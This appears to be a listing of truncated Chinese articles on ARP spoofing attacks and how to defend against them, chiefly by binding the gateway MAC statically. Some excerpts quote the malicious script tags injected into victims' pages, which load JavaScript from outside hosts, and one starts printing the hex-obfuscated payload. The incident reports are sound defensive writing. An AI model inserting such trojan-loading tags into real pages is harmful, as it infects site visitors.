服务器的ARP欺骗攻击的防范         这些天我的服务器几乎天天都被人ARP欺骗攻击，网页被挂木马，实在烦死了，深圳的龙岗电信机房实在是够恶心的，不得已，我只好寻找一些防范ARP攻击的方法，目前发现可以使用静态地址法和使用专用软件的方法来防范ARP欺骗攻击。　　静态地址法指的是，在本地服务器上，将路由器的MAC地址设置为静态的方式来阻止别人对我的ARP攻击，如果你也越到了类似的ARP欺骗攻击，也可以参考这个方法进行设置。　　首先，找到路由器真实的MAC地址，在没有被攻击的条件下，输入命令arp&nb...

什么是ARP？如何防范ARP欺骗技术? 　　什么是ARP？如何防范ARP欺骗技术?　　　首先说一下什么是ARP。如果你在UNIX Shell下输入 arp -a (9x下也是），你的输出看起来应该是这样的：　　Interface: xxx.xxx.xxx.xxx　　Internet Address Physical Address Type xxx.xxx.xxx.xxx 00-00-93-64-48-d2 dynamic 　　xxx.xxx.xxx.xx...

该病毒发作时症状表现为： 1）计算机网络连接正常，但无法上网或者时通时断，经常掉线；2）用户私密信息（如QQ、网游等帐号）被窃取；3）局域网内出现网络拥塞，甚至造成一些网络设备当机；基本概念： 为了能够说明问题，有必要先来介绍一些基本概念，知者略过。首先来说IP地址，大家应该都很熟悉了，我们知道，IP地址是一段32位（二进制）的无符号整数，例如：192.168.110.1，其最基本的作用就是在（IP）网络中唯一标识一台特定的主机。在Internet上，我们正是凭借IP地址来定位其他主机或者设备并进行相互通讯的。需要注意的是，IP协议位于OSI参考模型的第三层，即网络层，我们...

公司局域网访问所有页面都加上了<script src=http://16a.us/2.js></script>代码，这次是客户端打开的所有网页，故可排除是服务器环境遭遇arp欺骗，综合网上各方意见，得出结论：本地网关或dns被劫持，修复本地连接后故障消除。根本解决方法，绑定网关mac地址，方法为：命令行输入arp -s 网关IP 网关MAC关于网关MAC，可使用arp命令查询。如果是dns被劫持，则更改dns服务器。关于js加密解密的两篇文章，想研究上面病毒脚本的朋友可能用得着http://bbs.blueidea.com/vie...

昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码。刚开始以为网站被黑了，赶紧到服务器上查看所有文件是否带有这串js代码，搜索结果没有，而且服务器也没发现被入侵的痕迹。<script src=http://fuck.ns2go.com/dir/index_pic/1.js></script>于是只能从这段代码入手，我下载这个js开发发现是下面一段代码：[code]window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x5...

最近我的网站突然出现访问的迟钝，并且打开之后杀毒软件立即提示含有木马病毒。我就很纳闷，运行了4年的网站一直都好好的最近怎么出现病毒提示呢。职业习惯原因打开了网站的源代码查看，原来在网页源代码的头部被加入了<iframe>嵌套框架网页，该网页执行木马程序……按照常理我心中一寒：估计是服务器被人攻陷了，所有文件代码被加了此行代码，于是FTP上去，下载文件下来查看却没有该代码。于是询问服务器管理员含笑，他一听就说：“是中ARP欺骗的病毒攻击了”。那么什么是“ARP欺骗”呢？首先，ARP的意思是AddressResolutionProtocol（地址解析协议），它是一个位于TCP/IP协议...